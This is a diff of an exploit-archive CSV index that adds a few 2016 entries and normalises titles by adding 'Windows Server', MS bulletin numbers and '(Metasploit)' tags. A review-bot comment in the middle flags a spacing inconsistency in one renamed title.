 39928,platforms/osx/dos/39928.c,"Apple Mac OSX Kernel - Use-After-Free Due to Bad Locking in IOAcceleratorFamily2",2016-06-10,"Google Security Research",osx,dos,0
 39929,platforms/multiple/dos/39929.c,"Apple Mac OSX / iOS Kernel - UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient",2016-06-10,"Google Security Research",multiple,dos,0
 39930,platforms/osx/dos/39930.c,"Apple Mac OSX Kernel - GeForce GPU Driver Stack Buffer Overflow",2016-06-10,"Google Security Research",osx,dos,0
@@ -5265,6 +5265,12 @@ id,file,description,date,author,platform,type,port
 40762,platforms/linux/dos/40762.c,"Linux Kernel (Ubuntu / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0
 40766,platforms/windows/dos/40766.txt,"Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)",2016-11-15,"Google Security Research",windows,dos,0
 40773,platforms/windows/dos/40773.html,"Microsoft Edge - 'eval' Type Confusion",2016-11-17,"Google Security Research",windows,dos,0
+40787,platforms/windows/dos/40787.html,"Microsoft Edge - 'Array.splice' Heap Overflow",2016-11-18,"Google Security Research",windows,dos,0
+40779,platforms/windows/dos/40779.py,"Moxa SoftCMS 1.5 - Denial of Service (PoC)",2016-11-18,"Zhou Yu",windows,dos,0
+40784,platforms/windows/dos/40784.html,"Microsoft Edge - 'FillFromPrototypes' Type Confusion",2016-11-18,"Google Security Research",windows,dos,0
+40785,platforms/windows/dos/40785.html,"Microsoft Edge - 'Array.filter' Info Leak",2016-11-18,"Google Security Research",windows,dos,0
+40786,platforms/windows/dos/40786.html,"Microsoft Edge - 'Array.reverse' Overflow",2016-11-18,"Google Security Research",windows,dos,0
+40790,platforms/linux/dos/40790.txt,"Palo Alto Networks PanOS appweb3 - Stack Buffer Overflow",2016-11-18,"Google Security Research",linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -5369,11 +5375,11 @@ id,file,description,date,author,platform,type,port
 338,platforms/solaris/local/338.c,"Solaris 5.5.1 X11R6.3 - xterm (-xrm) Privilege Escalation",1997-05-28,"David Hedley",solaris,local,0
 339,platforms/linux/local/339.c,"zgv - '$HOME' Buffer Overflow",1997-06-20,"BeastMaster V",linux,local,0
 341,platforms/solaris/local/341.c,"Solaris 2.4 passwd / yppasswd / nispasswd - Overflows",1997-07-12,"Cristian Schipor",solaris,local,0
-350,platforms/windows/local/350.c,"Microsoft Windows 2000 - Utility Manager Privilege Elevation Exploit (MS04-019)",2004-07-14,"Cesar Cerrudo",windows,local,0
-351,platforms/windows/local/351.c,"Microsoft Windows 2000 - POSIX Subsystem Privilege Escalation (MS04-020)",2004-07-17,bkbll,windows,local,0
-352,platforms/windows/local/352.c,"Microsoft Windows 2000 - Universal Language Utility Manager Exploit (MS04-019)",2004-07-17,kralor,windows,local,0
-353,platforms/windows/local/353.c,"Microsoft Windows 2000/XP - Task Scheduler .job Exploit (MS04-022)",2004-07-18,anonymous,windows,local,0
-355,platforms/windows/local/355.c,"Microsoft Windows 2000 - Utility Manager All-in-One Exploit (MS04-019)",2004-07-20,kralor,windows,local,0
+350,platforms/windows/local/350.c,"Microsoft Windows Server 2000 - Utility Manager Privilege Elevation Exploit (MS04-019)",2004-07-14,"Cesar Cerrudo",windows,local,0
+351,platforms/windows/local/351.c,"Microsoft Windows Server 2000 - POSIX Subsystem Privilege Escalation (MS04-020)",2004-07-17,bkbll,windows,local,0
+352,platforms/windows/local/352.c,"Microsoft Windows Server 2000 - Universal Language Utility Manager Exploit (MS04-019)",2004-07-17,kralor,windows,local,0
+353,platforms/windows/local/353.c,"Microsoft Windows Server 2000/XP - Task Scheduler .job Exploit (MS04-022)",2004-07-18,anonymous,windows,local,0
+355,platforms/windows/local/355.c,"Microsoft Windows Server 2000 - Utility Manager All-in-One Exploit (MS04-019)",2004-07-20,kralor,windows,local,0
 367,platforms/osx/local/367.txt,"Apple
Mac OSX - Panther Internet Connect Privilege Escalation",2004-07-28,B-r00t,osx,local,0
 368,platforms/windows/local/368.c,"Microsoft Windows XP - Task Scheduler '.job' Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0
 369,platforms/linux/local/369.pl,"SoX - Local Buffer Overflow",2004-08-01,"Serkan Akpolat",linux,local,0
@@ -5541,7 +5547,7 @@ id,file,description,date,author,platform,type,port
 1403,platforms/windows/local/1403.c,"WinRAR 3.30 - Long Filename Buffer Overflow (1)",2006-01-04,K4P0,windows,local,0
 1404,platforms/windows/local/1404.c,"WinRAR 3.30 - Long Filename Buffer Overflow (2)",2006-01-04,c0d3r,windows,local,0
 1406,platforms/windows/local/1406.php,"PHP 4.4.0 - (mysql_connect function) Local Buffer Overflow",2006-01-05,mercenary,windows,local,0
-1407,platforms/windows/local/1407.c,"Microsoft Windows 2000 Kernel - APC Data-Free Local Escalation Exploit (MS05-055)",2006-01-05,SoBeIt,windows,local,0
+1407,platforms/windows/local/1407.c,"Microsoft Windows Server 2000 Kernel - APC Data-Free Local Escalation Exploit (MS05-055)",2006-01-05,SoBeIt,windows,local,0
 1412,platforms/linux/local/1412.rb,"Xmame 0.102 - '-lang' Local Buffer Overflow",2006-01-10,xwings,linux,local,0
 1415,platforms/linux/local/1415.c,"Xmame 0.102 - 'lang' Local Buffer Overflow (C)",2006-01-13,Qnix,linux,local,0
 1425,platforms/linux/local/1425.c,"Xmame 0.102 - '-pb/-lang/-rec' Local Buffer Overflow",2006-01-21,sj,linux,local,0
@@ -5573,7 +5579,7 @@ id,file,description,date,author,platform,type,port
 40336,platforms/windows/local/40336.py,"Navicat Premium 11.2.11 (x64) - Local Database Password Disclosure",2016-09-05,"Yakir Wizman",windows,local,0
 1831,platforms/linux/local/1831.txt,"tiffsplit (libtiff 3.8.2) - Local Stack Buffer Overflow (PoC)",2006-05-26,nitr0us,linux,local,0
 1910,platforms/windows/local/1910.c,"Microsoft Windows - (NtClose DeadLock) PoC (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0
-1911,platforms/windows/local/1911.c,"Microsoft Windows 2000/XP - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0
+1911,platforms/windows/local/1911.c,"Microsoft Windows Server 2000/XP - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)",2006-06-14,"Ruben Santamarta",windows,local,0
 1917,platforms/windows/local/1917.pl,"Pico Zip 4.01 - (Long Filename) Buffer Overflow",2006-06-15,c0rrupt,windows,local,0
 1924,platforms/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 - Root Password Disclosure",2006-06-18,php0t,multiple,local,0
 1944,platforms/windows/local/1944.c,"Microsoft Excel - Unspecified Remote Code Execution",2006-06-22,"naveed afzal",windows,local,0
@@ -5844,7 +5850,7 @@ id,file,description,date,author,platform,type,port
 6337,platforms/linux/local/6337.sh,"Postfix 2.6-20080814 - (symlink) Privilege Escalation",2008-08-31,RoMaNSoFt,linux,local,0
 6389,platforms/windows/local/6389.cpp,"Numark Cue 5.0 rev 2 - Local '.m3u' File Stack Buffer Overflow",2008-09-06,"fl0 fl0w",windows,local,0
 6705,platforms/windows/local/6705.txt,"Microsoft Windows 2003 - Token Kidnapping Local Exploit (PoC)",2008-10-08,"Cesar Cerrudo",windows,local,0
-6757,platforms/windows/local/6757.txt,"Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin)",2008-10-15,"Ruben Santamarta",windows,local,0
+6757,platforms/windows/local/6757.txt,"Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin) (MS08-066)",2008-10-15,"Ruben Santamarta",windows,local,0
 6787,platforms/windows/local/6787.pl,"BitTorrent 6.0.3 - '.torrent' Stack Buffer Overflow",2008-10-19,"Guido Landi",windows,local,0
 6798,platforms/windows/local/6798.pl,"VideoLAN VLC Media Player 0.9.4 - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0
 6825,platforms/windows/local/6825.pl,"VideoLAN VLC Media Player 0.9.4 - '.ty' Buffer Overflow (SEH)",2008-10-23,"Guido Landi",windows,local,0
@@ -6400,7 +6406,7 @@ id,file,description,date,author,platform,type,port
 14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Local Exploit Direct Ret ver",2010-07-07,chap0,windows,local,0
 14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,linux,local,0
 14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - SEH Exploit (Multiple OS ASLR + DEP Bypass) (Metasploit)",2010-07-13,Node,windows,local,0
-14361,platforms/windows/local/14361.py,"Microsoft Excel - 0x5D record Stack Overflow",2010-07-14,webDEViL,windows,local,0
+14361,platforms/windows/local/14361.py,"Microsoft Excel - 0x5D record Stack Overflow (MS10-038)",2010-07-14,webDEViL,windows,local,0
 14373,platforms/win_x86/local/14373.pl,"Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Stack Buffer Overflow Universal",2010-07-16,Madjix,win_x86,local,0
 14397,platforms/windows/local/14397.rb,"MoreAmp - Buffer Overflow (SEH) (Metasploit)",2010-07-17,Madjix,windows,local,0
 14403,platforms/windows/local/14403.txt,"Microsoft Windows - Automatic LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0
@@ -6584,7 +6590,7 @@ id,file,description,date,author,platform,type,port
 15972,platforms/windows/local/15972.c,"DriveCrypt 5.3 - Local Kernel Ring0 SYSTEM Exploit",2011-01-11,mu-b,windows,local,0
 16264,platforms/windows/local/16264.pl,"Magic Music Editor - Buffer Overflow",2011-03-02,"C4SS!0 G0M3S",windows,local,0
 15975,platforms/windows/local/15975.py,"Nokia MultiMedia Player 1.0 - SEH Unicode Exploit",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0
-15985,platforms/windows/local/15985.c,"Win32k - Keyboard Layout (MS10-073)",2011-01-13,"Ruben Santamarta",windows,local,0
+15985,platforms/windows/local/15985.c,"Microsoft Win32k - Keyboard Layout (MS10-073)",2011-01-13,"Ruben Santamarta",windows,local,0
 15994,platforms/windows/local/15994.rb,"eXtremeMP3 Player - Buffer Overflow (SEH)",2011-01-15,"C4SS!0 G0M3S",windows,local,0
 16009,platforms/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - '.wav' Buffer Overflow",2011-01-18,h1ch4m,windows,local,0
 17210,platforms/windows/local/17210.rb,"eZip Wizard 3.0 - Stack Buffer Overflow (Metasploit)",2011-04-25,Metasploit,windows,local,0
@@ -6612,79 +6618,79 @@ id,file,description,date,author,platform,type,port
 16253,platforms/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Buffer Overflow",2011-02-27,sickness,windows,local,0
 16307,platforms/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,multiple,local,0
 40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 - 'Netfilter' Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0
-16503,platforms/windows/local/16503.rb,"Adobe - Doc.media.newPlayer Use-After-Free (1)",2010-04-30,Metasploit,windows,local,0
-16504,platforms/windows/local/16504.rb,"Adobe - 'util.printf()' Buffer Overflow (1)",2010-05-03,Metasploit,windows,local,0
+16503,platforms/windows/local/16503.rb,"Adobe - Doc.media.newPlayer Use-After-Free (Metasploit) (1)",2010-04-30,Metasploit,windows,local,0
+16504,platforms/windows/local/16504.rb,"Adobe - 'util.printf()' Buffer Overflow (Metasploit) (1)",2010-05-03,Metasploit,windows,local,0
 16531,platforms/windows/local/16531.rb,"Winamp - Playlist UNC Path Computer Name Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
-16546,platforms/windows/local/16546.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (1)",2010-09-20,Metasploit,windows,local,0
+16546,platforms/windows/local/16546.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (1)",2010-09-20,Metasploit,windows,local,0
 16556,platforms/windows/local/16556.rb,"XMPlay 3.3.0.4 - (ASX Filename) Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,local,0
 16562,platforms/windows/local/16562.rb,"Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,local,0
 16589,platforms/windows/local/16589.rb,"Apple QuickTime 7.6.7 - _Marshaled_pUnk Code Execution (Metasploit)",2011-01-08,Metasploit,windows,local,0
-16593,platforms/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption (1)",2010-06-15,Metasploit,windows,local,0
-16606,platforms/windows/local/16606.rb,"Adobe - Collab.getIcon() Buffer Overflow (1)",2010-04-30,Metasploit,windows,local,0
-16614,platforms/windows/local/16614.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (1)",2010-09-20,Metasploit,windows,local,0
-16615,platforms/windows/local/16615.rb,"Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (Metasploit)",2010-04-30,Metasploit,windows,local,0
+16593,platforms/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption (Metasploit) (1)",2010-06-15,Metasploit,windows,local,0
+16606,platforms/windows/local/16606.rb,"Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (1)",2010-04-30,Metasploit,windows,local,0
+16614,platforms/windows/local/16614.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (1)",2010-09-20,Metasploit,windows,local,0
+16615,platforms/windows/local/16615.rb,"Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (MS09-032/MS09-037) (Metasploit)",2010-04-30,Metasploit,windows,local,0
 16617,platforms/windows/local/16617.rb,"VUPlayer - '.m3u' Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
 16618,platforms/windows/local/16618.rb,"BlazeDVD 5.1 - PLF Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
-16619,platforms/windows/local/16619.rb,"Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0
-16620,platforms/windows/local/16620.rb,"Media Jukebox 8.0.400 - Buffer Overflow (SEH)",2011-01-08,Metasploit,windows,local,0
+16619,platforms/windows/local/16619.rb,"Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
+16620,platforms/windows/local/16620.rb,"Media Jukebox 8.0.400 - Buffer Overflow (SEH) (Metasploit)",2011-01-08,Metasploit,windows,local,0
 16621,platforms/windows/local/16621.rb,"Foxit PDF Reader 4.1.1 - Title Stack Buffer Overflow (Metasploit)",2010-12-16,Metasploit,windows,local,0
-16622,platforms/windows/local/16622.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (2)",2010-09-25,Metasploit,windows,local,0
-16623,platforms/windows/local/16623.rb,"Adobe - Doc.media.newPlayer Use-After-Free (2)",2010-09-25,Metasploit,windows,local,0
-16624,platforms/windows/local/16624.rb,"Adobe - 'util.printf()' Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0
-16625,platforms/windows/local/16625.rb,"Microsoft Excel - Malformed FEATHEADER Record (Metasploit)",2010-09-25,Metasploit,windows,local,0
+16622,platforms/windows/local/16622.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
+16623,platforms/windows/local/16623.rb,"Adobe - Doc.media.newPlayer Use-After-Free (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
+16624,platforms/windows/local/16624.rb,"Adobe - 'util.printf()' Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
+16625,platforms/windows/local/16625.rb,"Microsoft Excel - Malformed FEATHEADER Record (MS09-067) (Metasploit)",2010-09-25,Metasploit,windows,local,0
 16626,platforms/windows/local/16626.rb,"Audiotran 1.4.1 - '.pls' Stack Buffer Overflow (Metasploit)",2010-01-28,Metasploit,windows,local,0
 16627,platforms/windows/local/16627.rb,"UltraISO - '.cue' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
 16628,platforms/windows/local/16628.rb,"Fat Player Media Player 0.6b0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
 16629,platforms/windows/local/16629.rb,"VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)",2011-02-02,Metasploit,windows,local,0
-16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (3)",2010-09-25,Metasploit,windows,local,0
+16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (3)",2010-09-25,Metasploit,windows,local,0
 16632,platforms/windows/local/16632.rb,"ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
 16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
 16634,platforms/windows/local/16634.rb,"Free Download Manager - Torrent Parsing Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
 16636,platforms/windows/local/16636.rb,"Millenium MP3 Studio 2.0 - '.pls' Stack Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
 16637,platforms/windows/local/16637.rb,"VideoLAN VLC Media Player 1.1.6 - 'MKV' Memory Corruption (Metasploit)",2011-02-08,Metasploit,windows,local,0
 16640,platforms/windows/local/16640.rb,"feedDemon 3.1.0.12 - Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
-16642,platforms/windows/local/16642.rb,"WM Downloader 3.1.2.2 - Buffer Overflow (2)",2010-11-11,Metasploit,windows,local,0
+16642,platforms/windows/local/16642.rb,"WM Downloader 3.1.2.2 - Buffer Overflow (Metasploit) (2)",2010-11-11,Metasploit,windows,local,0
 16643,platforms/windows/local/16643.rb,"SafeNet SoftRemote - GROUPNAME Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
 16644,platforms/windows/local/16644.rb,"VariCAD 2010-2.05 EN - '.DWB' Stack Buffer Overflow (Metasploit)",2010-04-05,Metasploit,windows,local,0
 16645,platforms/windows/local/16645.rb,"URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
 16646,platforms/windows/local/16646.rb,"HT-MP3Player 1.0 - '.HT3' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
-16648,platforms/windows/local/16648.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0
-16650,platforms/windows/local/16650.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (2)",2010-09-25,Metasploit,windows,local,0
+16648,platforms/windows/local/16648.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
+16650,platforms/windows/local/16650.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
 16651,platforms/windows/local/16651.rb,"AOL 9.5 - Phobos.Playlist Import() Stack Based Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
-16652,platforms/windows/local/16652.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (2)",2010-09-25,Metasploit,windows,local,0
+16652,platforms/windows/local/16652.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
 16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 - Unicode Stack Buffer Overflow (Metasploit)",2010-12-16,Metasploit,windows,local,0
 16654,platforms/windows/local/16654.rb,"Orbital Viewer - '.ORB' File Parsing Buffer Overflow (Metasploit)",2010-03-09,Metasploit,windows,local,0
 16655,platforms/windows/local/16655.rb,"ProShow Gold 4.0.2549 - '.psh' Stack Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
 16656,platforms/windows/local/16656.rb,"Altap Salamander 2.5 PE Viewer - Buffer Overflow (Metasploit)",2010-12-16,Metasploit,windows,local,0
 16658,platforms/windows/local/16658.rb,"VUPlayer - '.cue' Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
 16659,platforms/aix/local/16659.rb,"Cain & Abel 4.9.24 - RDP Buffer Overflow (Metasploit)",2010-11-24,Metasploit,aix,local,0
-16660,platforms/windows/local/16660.rb,"Microsoft Windows - CreateSizedDIBSECTION Stack Buffer Overflow (Metasploit)",2011-02-08,Metasploit,windows,local,0
+16660,platforms/windows/local/16660.rb,"Microsoft Windows - CreateSizedDIBSECTION Stack Buffer Overflow (MS11-006) (Metasploit)",2011-02-08,Metasploit,windows,local,0
 16661,platforms/windows/local/16661.rb,"Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
 16662,platforms/windows/local/16662.rb,"A-PDF WAV to MP3 1.0.0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
 16663,platforms/windows/local/16663.rb,"S.O.M.P.L 1.0 Player - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
-16664,platforms/windows/local/16664.rb,"gAlan 0.2.1 - Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0
-16665,platforms/windows/local/16665.rb,"Microsoft PowerPoint Viewer - TextBytesAtom Stack Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
+16664,platforms/windows/local/16664.rb,"gAlan 0.2.1 - Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
+16665,platforms/windows/local/16665.rb,"Microsoft PowerPoint Viewer - TextBytesAtom Stack Buffer Overflow (MS10-004) (Metasploit)",2010-09-25,Metasploit,windows,local,0
 16666,platforms/windows/local/16666.rb,"UltraISO - '.CCD' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
 16667,platforms/windows/local/16667.rb,"Adobe Flash Player - 'Button' Remote Code Execution (Metasploit)",2010-11-01,Metasploit,windows,local,0
-16668,platforms/windows/local/16668.rb,"BACnet OPC Client - Buffer Overflow (2)",2010-11-14,Metasploit,windows,local,0
+16668,platforms/windows/local/16668.rb,"BACnet OPC Client - Buffer Overflow (Metasploit) (2)",2010-11-14,Metasploit,windows,local,0
 16669,platforms/windows/local/16669.rb,"Adobe Illustrator CS4 14.0.0 - Postscript (.eps) Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
 16670,platforms/windows/local/16670.rb,"Adobe Acrobat - Bundled LibTIFF Integer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
 16671,platforms/windows/local/16671.rb,"Adobe PDF - Embedded EXE Social Engineering (Metasploit)",2010-12-16,Metasploit,windows,local,0
-16672,platforms/windows/local/16672.rb,"Adobe - JBIG2Decode Memory Corruption (2)",2010-09-25,Metasploit,windows,local,0
+16672,platforms/windows/local/16672.rb,"Adobe - JBIG2Decode Memory Corruption (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
 16673,platforms/windows/local/16673.rb,"Digital Music Pad 8.2.3.3.4 - Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
 16674,platforms/windows/local/16674.rb,"Adobe - Collab.collectEmailInfo() Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
 16675,platforms/windows/local/16675.rb,"AstonSoft DeepBurner - '.dbr' Path Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,local,0
-16676,platforms/windows/local/16676.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (2)",2011-01-08,Metasploit,windows,local,0
+16676,platforms/windows/local/16676.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (2)",2011-01-08,Metasploit,windows,local,0
 16677,platforms/windows/local/16677.rb,"CA AntiVirus Engine - CAB Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
 16678,platforms/windows/local/16678.rb,"VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,local,0
 16679,platforms/windows/local/16679.rb,"Nuance PDF Reader 6.0 - Launch Stack Buffer Overflow (Metasploit)",2011-01-08,Metasploit,windows,local,0
 16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic - '.VBP' Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
-16681,platforms/windows/local/16681.rb,"Adobe - Collab.getIcon() Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0
-16682,platforms/windows/local/16682.rb,"Adobe PDF - Escape EXE Social Engineering (No JavaScript)",2010-12-16,Metasploit,windows,local,0
-16683,platforms/windows/local/16683.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (4)",2010-09-25,Metasploit,windows,local,0
+16681,platforms/windows/local/16681.rb,"Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
+16682,platforms/windows/local/16682.rb,"Adobe PDF - Escape EXE Social Engineering (No JavaScript)(Metasploit)",2010-12-16,Metasploit,windows,local,0
+16683,platforms/windows/local/16683.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit) (4)",2010-09-25,Metasploit,windows,local,0
 16684,platforms/windows/local/16684.rb,"Destiny Media Player 1.61 - PLS .m3u Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
-16686,platforms/windows/local/16686.rb,"Microsoft Word - RTF pFragments Stack Buffer Overflow (File Format)",2011-03-04,Metasploit,windows,local,0
-16687,platforms/windows/local/16687.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (2)",2010-09-25,Metasploit,windows,local,0
+16686,platforms/windows/local/16686.rb,"Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)",2011-03-04,Metasploit,windows,local,0
+16687,platforms/windows/local/16687.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0
 16688,platforms/windows/local/16688.rb,"Zinf Audio Player 2.2.1 - '.pls' Stack Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,local,0
 16940,platforms/windows/local/16940.c,".NET Runtime Optimization Service - Privilege Escalation",2011-03-08,XenoMuta,windows,local,0
 16942,platforms/windows/local/16942.pl,"Movavi VideoSuite 8.0 MediaPlayer - '.m3u' Buffer Overflow",2011-03-08,KedAns-Dz,windows,local,0
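Review bot: The new title for 16682 ends in `(No JavaScript)(Metasploit)` with no space before the added tag, while every other title this hunk touches separates it as ` (Metasploit)`. Anything that filters or de-duplicates index entries on the space-delimited tag would treat this row differently from its neighbours. Suggest `"Adobe PDF - Escape EXE Social Engineering (No JavaScript) (Metasploit)"`. Tag placement also varies between renames here: most put `(Metasploit)` before the ordinal, as in `(Metasploit) (2)`, while 16620 and 16650 put it after `(SEH)`, so it may be worth stating the intended order in the commit description.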
@@ -6715,7 +6721,7 @@ id,file,description,date,author,platform,type,port
 17171,platforms/windows/local/17171.pl,"SimplyPlay 66 - '.pls' Buffer Overflow",2011-04-14,"C4SS!0 G0M3S",windows,local,0
 17177,platforms/windows/local/17177.rb,"Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)",2011-04-16,"Andrew King",windows,local,0
 17185,platforms/windows/local/17185.py,"Wireshark 1.4.1 < 1.4.4 - SEH Overflow",2011-04-18,sickness,windows,local,0
-17186,platforms/windows/local/17186.rb,"Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (1)",2011-04-19,Metasploit,windows,local,0
+17186,platforms/windows/local/17186.rb,"Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (Metasploit) (1)",2011-04-19,Metasploit,windows,local,0
 17217,platforms/windows/local/17217.py,"Subtitle Processor 7.7.1 - SEH Unicode Buffer Overflow",2011-04-27,"Brandon Murphy",windows,local,0
 17223,platforms/windows/local/17223.pl,"NetOp Remote Control 8.0 / 9.1 / 9.2 / 9.5 - Buffer Overflow",2011-04-28,chap0,windows,local,0
 17225,platforms/windows/local/17225.rb,"Subtitle Processor 7.7.1 - '.m3u' SEH Unicode Buffer Overflow (Metasploit)",2011-04-28,Metasploit,windows,local,0
@@ -6737,7 +6743,7 @@ id,file,description,date,author,platform,type,port
 17391,platforms/linux/local/17391.c,"Linux Kernel 2.6.28 / 3.0 (DEC Alpha Linux) - Privilege Escalation",2011-06-11,"Dan Rosenberg",linux,local,0
 17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - '.fat' Buffer Overflow",2011-06-23,"Iván García Ferreira",windows,local,0
 17449,platforms/windows/local/17449.py,"FreeAmp 2.0.7 - '.pls' Buffer Overflow",2011-06-24,"C4SS!0 G0M3S",windows,local,0
-17451,platforms/windows/local/17451.rb,"Microsoft Visio - 'VISIODWG.dll' .DXF File Handling (Metasploit)",2011-06-26,Metasploit,windows,local,0
